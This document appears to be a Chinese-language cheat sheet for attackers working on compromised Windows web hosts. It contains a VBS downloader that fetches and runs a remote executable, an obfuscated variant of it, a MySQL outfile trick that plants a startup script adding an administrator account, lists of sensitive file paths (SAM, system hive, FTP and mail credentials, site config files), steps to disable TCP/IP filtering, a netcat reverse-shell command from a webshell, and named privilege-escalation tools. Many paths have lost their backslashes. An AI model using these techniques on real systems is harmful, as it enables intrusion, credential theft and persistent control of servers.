vbs 下载者:
03 |
echo Set sGet = createObject("ADODB.Stream") >>c:windowscftmon.vbs |
05 |
echo sGet.Mode = 3 >>c:windowscftmon.vbs |
07 |
echo sGet.Type = 1 >>c:windowscftmon.vbs |
09 |
echo sGet.Open() >>c:windowscftmon.vbs |
11 |
echo sGet.Write(xPost.responseBody) >>c:windowscftmon.vbs |
13 |
echo sGet.SaveToFile "c:windowse.exe",2 >>c:windowscftmon.vbs |
15 |
echo Set objShell = CreateObject("Wscript.Shell") >>c:windowscftmon.vbs |
17 |
echo objshell.run """c:windowse.exe""" >>c:windowscftmon.vbs |
2:
01 |
On Error Resume Next:Dim iRemote,iLocal,s1,s2 |
03 |
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0)) |
05 |
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream" |
07 |
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send() |
09 |
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open() |
11 |
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2 |
14 |
create table a (cmd text): |
1 |
insert into a values ("set wshshell=createobject (""wscript.shell"")"); |
3 |
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)"); |
5 |
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)"); |
7 |
select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs"; |
Cmd 下目录的操作技巧:
列出d的所有目录:
1 |
for /d %i in (d:freehost*) do @echo %i |
把当前路径下文件夹的名字只有1-3个字母的显示出来:
1 |
for /d %i in (???) do @echo %i |
以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:
1 |
for /r %i in (*.exe) do @echo %i |
以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:
1 |
for /r "f:freehosthmadesignweb" %i in (*.*) do @echo %i |
这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:
1 |
for /f %i in (c:1.txt) do echo %i |
delims=后的空格是分隔符,tokens是取第几个位置:
1 |
for /f "tokens=2 delims= " %i in (a.txt) do echo %i |
Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):
009 |
c:CMailServerconfig.ini |
011 |
c:CMailServerCMailServer.exe |
013 |
c:CMailServerWebMailindex.asp |
015 |
c:program filesCMailServerCMailServer.exe |
017 |
c:program filesCMailServerWebMailindex.asp |
019 |
C:WinWebMailSysInfo.ini |
021 |
C:WinWebMailWebdefault.asp |
023 |
C:WINDOWSFreeHost32.dll |
025 |
C:WINDOWS7i24iislog4.exe |
027 |
C:WINDOWS7i24tool.exe |
029 |
c:hzhostdatabasesurl.asp |
033 |
C:Documents and SettingsAll Users「开始」菜单程序7i24虚拟主机管理平台自动设置[受控端].lnk |
035 |
C:Documents and SettingsAll Users「开始」菜单程序Serv-UServ-U Administrator.lnk |
067 |
c:WWWROOTdefault.html |
069 |
c:websitedefault.html |
087 |
C:Inetpubwwwrootpagerror.gif |
093 |
C:Program FilesMicrosoft OfficeOFFICE10winword.exe |
095 |
C:Program FilesMicrosoft OfficeOFFICE11winword.exe |
097 |
C:Program FilesMicrosoft OfficeOFFICE12winword.exe |
099 |
C:Program FilesInternet ExplorerIEXPLORE.EXE |
101 |
C:Program Fileswinrar
ar.exe |
103 |
C:Program Files360360Safe360safe.exe |
105 |
C:Program Files360Safe360safe.exe |
107 |
C:Documents and SettingsAdministratorApplication Data360Safe360Examine360Examine.log |
113 |
C:Program FilesRisingRavRsTask.xml |
115 |
C:Documents and SettingsAll UsersStart Menudesktop.ini |
117 |
C:Documents and SettingsAdministratorMy DocumentsDefault.rdp |
119 |
C:Documents and SettingsAdministratorCookiesindex.dat |
121 |
C:Documents and SettingsAdministratorMy Documents新建 文本文档.txt |
123 |
C:Documents and SettingsAdministrator桌面新建 文本文档.txt |
125 |
C:Documents and SettingsAdministratorMy Documents1.txt |
127 |
C:Documents and SettingsAdministrator桌面1.txt |
129 |
C:Documents and SettingsAdministratorMy Documentsa.txt |
131 |
C:Documents and SettingsAdministrator桌面a.txt |
133 |
C:Documents and SettingsAll UsersDocumentsMy PicturesSample PicturesBlue hills.jpg |
135 |
E:Inetpubwwwrootaspnet_clientsystem_web1_1_4322SmartNav.htm |
137 |
C:Program FilesRhinoSoft.comServ-UVersion.txt |
139 |
C:Program FilesRhinoSoft.comServ-UServUDaemon.ini |
141 |
C:Program FilesSymantecSYMEVENT.INF |
143 |
C:Program FilesMicrosoft SQL Server80ToolsBinnsqlmangr.exe |
145 |
C:Program FilesMicrosoft SQL ServerMSSQLDatamaster.mdf |
147 |
C:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLDatamaster.mdf |
149 |
C:Program FilesMicrosoft SQL ServerMSSQL.2MSSQLDatamaster.mdf |
151 |
C:Program FilesMicrosoft SQL Server80ToolsHTMLdatabase.htm |
153 |
C:Program FilesMicrosoft SQL ServerMSSQLREADME.TXT |
155 |
C:Program FilesMicrosoft SQL Server90ToolsBinDdsShapes.dll |
157 |
C:Program FilesMicrosoft SQL ServerMSSQLsqlsunin.ini |
159 |
C:MySQLMySQL Server 5.0my.ini |
161 |
C:Program FilesMySQLMySQL Server 5.0my.ini |
163 |
C:Program FilesMySQLMySQL Server 5.0datamysqluser.frm |
165 |
C:Program FilesMySQLMySQL Server 5.0COPYING |
167 |
C:Program FilesMySQLMySQL Server 5.0sharemysql_fix_privilege_tables.sql |
169 |
C:Program FilesMySQLMySQL Server 4.1inmysql.exe |
171 |
c:MySQLMySQL Server 4.1inmysql.exe |
173 |
c:MySQLMySQL Server 4.1datamysqluser.frm |
175 |
C:Program FilesOracleoraconfigLpk.dll |
177 |
C:WINDOWSMicrosoft.NETFrameworkv2.0.50727aspnet_state.exe |
179 |
C:WINDOWSsystem32inetsrvw3wp.exe |
181 |
C:WINDOWSsystem32inetsrvinetinfo.exe |
183 |
C:WINDOWSsystem32inetsrvMetaBase.xml |
185 |
C:WINDOWSsystem32inetsrviisa, dmpwdachg.asp |
187 |
C:WINDOWSsystem32configdefault.LOG |
189 |
C:WINDOWSsystem32configsam |
191 |
C:WINDOWSsystem32configsystem |
193 |
c:CMailServerconfig.ini |
195 |
c:program filesCMailServerconfig.ini |
197 |
c: omcat6 omcat6inversion.sh |
199 |
c: omcat6inversion.sh |
203 |
c:program files omcat6inversion.sh |
205 |
C:Program FilesApache Software FoundationTomcat 6.0inversion.sh |
207 |
c:Program FilesApache Software FoundationTomcat 6.0logsisapi_redirect.log |
209 |
c:Apache2Apache2inApache.exe |
211 |
c:Apache2inApache.exe |
213 |
c:Apache2phplicense.txt |
215 |
C:Program FilesApache GroupApache2inApache.exe |
217 |
c:Program FilesQQ2007qq.exe |
219 |
c:Program FilesTencent\, qqUser.db |
221 |
c:Program FilesTencentqqqq.exe |
223 |
c:Program FilesTencentqqinqq.exe |
225 |
c:Program FilesTencentqq2009qq.exe |
227 |
c:Program FilesTencentqq2008qq.exe |
229 |
c:Program FilesTencentqq2010inqq.exe |
231 |
c:Program FilesTencentqqUsersAll UsersRegistry.db |
233 |
C:Program FilesTencentTMTMDllsQQZip.dll |
235 |
c:Program FilesTencentTmBinTxplatform.exe |
237 |
c:Program FilesTencentRTXServerAppConfig.xml |
239 |
C:Program FilesFoxmalFoxmail.exe |
241 |
C:Program FilesFoxmalaccounts.cfg |
243 |
C:Program Files encentFoxmalFoxmail.exe |
245 |
C:Program Files encentFoxmalaccounts.cfg |
247 |
C:Program FilesLeapFTP 3.0LeapFTP.exe |
249 |
C:Program FilesLeapFTPLeapFTP.exe |
251 |
c:Program FilesGlobalSCAPECuteFTP Procftppro.exe |
253 |
c:Program FilesGlobalSCAPECuteFTP Pro
otes.txt |
255 |
C:Program FilesFlashFXPFlashFXP.ini |
257 |
C:Program FilesFlashFXPflashfxp.exe |
259 |
c:Program FilesOraclein
egsvr32.exe |
261 |
c:Program Files腾讯游戏QQGAME
eadme.txt |
263 |
c:Program Files encent腾讯游戏QQGAME
eadme.txt |
265 |
c:Program Files encentQQGAME
eadme.txt |
267 |
C:Program FilesStormIIStorm.exe |
各种网站的配置文件相对路径大全:
017 |
../../../config.inc.php |
047 |
../../../config.inc.php |
051 |
../../config/config.php |
055 |
../../../config/config.php |
057 |
/config/config.inc.php |
059 |
./config/config.inc.php |
061 |
../../config/config.inc.php |
063 |
../config/config.inc.php |
065 |
../../../config/config.inc.php |
071 |
../../config/conn.php |
075 |
../../../config/conn.php |
081 |
../../config/conn.asp |
085 |
../../../config/conn.asp |
087 |
/config/config.inc.php |
089 |
./config/config.inc.php |
091 |
../../config/config.inc.php |
093 |
../config/config.inc.php |
095 |
../../../config/config.inc.php |
099 |
../../data/config.php |
103 |
../../../data/config.php |
107 |
./data/config.inc.php |
109 |
../../data/config.inc.php |
111 |
../data/config.inc.php |
113 |
../../../data/config.inc.php |
123 |
../../../data/conn.php |
133 |
../../../data/conn.asp |
137 |
./data/config.inc.php |
139 |
../../data/config.inc.php |
141 |
../data/config.inc.php |
143 |
../../../data/config.inc.php |
147 |
../../include/config.php |
149 |
../include/config.php |
151 |
../../../include/config.php |
153 |
/include/config.inc.php |
155 |
./include/config.inc.php |
157 |
../../include/config.inc.php |
159 |
../include/config.inc.php |
161 |
../../../include/config.inc.php |
167 |
../../include/conn.php |
171 |
../../../include/conn.php |
177 |
../../include/conn.asp |
181 |
../../../include/conn.asp |
183 |
/include/config.inc.php |
185 |
./include/config.inc.php |
187 |
../../include/config.inc.php |
189 |
../include/config.inc.php |
191 |
../../../include/config.inc.php |
199 |
../../../inc/config.php |
205 |
../../inc/config.inc.php |
207 |
../inc/config.inc.php |
209 |
../../../inc/config.inc.php |
219 |
../../../inc/conn.php |
229 |
../../../inc/conn.asp |
235 |
../../inc/config.inc.php |
237 |
../inc/config.inc.php |
239 |
../../../inc/config.inc.php |
去除TCP IP筛选:
TCP/IP筛选在注册表里有三处,分别是:
1 |
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip |
3 |
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip |
5 |
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip |
分别用以下命令来导出注册表项:
1 |
regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip |
3 |
regedit -e D:.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip |
5 |
regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip |
然后再把三个文件里的:
1 |
“EnableSecurityFilters"=dword:00000001” |
改为:
1 |
“EnableSecurityFilters"=dword:00000000” |
再将以上三个文件分别用以下命令导入注册表即可:
Webshell 提权小技巧:
Cmd路径:
Nc 也在同目录下,例如反弹cmdshell:
1 |
"c:windows emp
c.exe -vv ip 999 -e c:windows empcmd.exe" |
通常都不会成功。
而直接在 cmd 路径上输入:
命令输入:
却能成功。。这个不是重点
我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。
命令行调用 RAR 打包:
1 |
rar a -k -r -s -m3 c:1.rar c:folde |